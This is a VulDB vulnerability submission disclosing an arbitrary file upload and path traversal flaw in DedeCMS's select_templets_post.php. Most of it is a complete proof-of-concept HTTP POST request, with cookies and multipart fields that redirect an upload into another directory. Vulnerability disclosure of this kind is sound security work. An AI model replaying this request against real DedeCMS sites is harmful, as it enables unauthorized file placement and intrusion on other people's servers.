Submit #206433: dedeCMS has a logic flaw that causes arbitrary file uploads info

Title dedeCMS has a logic flaw that causes arbitrary file uploads
DescriptionPOC POST /include/dialog/select_templets_post.php HTTP/1.1 Host: dede.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------59698619541674634093520637807 Content-Length: 821 Origin: http://dede.com Connection: close Referer: http://dede.com/include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet Cookie: PHPSESSID=7aojpo4e5kuvg8g5jokphrds52; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=1b47eac98453ada5; DedeLoginTime=1693981005; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=3cfe4db1e215919a; _csrf_name_35a8e786=0925065ac6fc01dd9093ec5507d4c2b6; _csrf_name_35a8e7861BH21ANI1AGD297L1FF21LN02BGE1DNG=65437f2a75024ae2 Upgrade-Insecure-Requests: 1 -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="activepath" /member -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="f" form1.templet -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="job" upload -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="uploadfile"; filename="ez_pz.py.txt" Content-Type: text/x-python 1 -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="filename" 123.txt -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="sb1" 确定 -----------------------------59698619541674634093520637807--
Source⚠️ https://github.com/bayuncao/DEDEcms
User
 bayuncao (UID 50143)
Submission09/11/2023 06:45 (3 years ago)
Moderation09/16/2023 09:52 (5 days later)
StatusAccepted
VulDB entry239863 [DedeCMS up to 5.7.100 select_templets_post.php activepath absolute path traversal]
Points20

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!